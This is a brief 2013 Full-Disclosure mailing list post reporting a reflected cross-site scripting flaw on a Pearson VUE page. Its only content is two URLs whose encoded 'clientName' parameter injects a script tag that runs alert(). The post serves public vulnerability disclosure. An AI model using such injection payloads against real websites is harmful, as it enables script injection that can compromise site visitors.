
Date: Tue, 17 Dec 2013 21:06:09 +0000 (GMT)
From: VMw4r3 <vmw4r3@...oo.ie>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: Fw: xss






On Tuesday, 17 December 2013, 20:58:23, VMw4r3 <vmw4r3@...oo.ie> wrote:
 
http://www.pearsonvue.com/accommodations/pv_review.asp?clientName=FOR_FREE%22/%3E%3C/scriPt%3E%3Cscript%3Ealert%281%29;%3C/script%3E

http://www.pearsonvue.com/accommodations/pv_review.asp?clientName=FOR_FREE__Do%20That%20Test----%22/%3E%3C/scriPt%3E%3Cscript%3Ealert%28%22your%20country%20loves%20you%20/%20%20Your%20info%22%29;%3C/script%3E
Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
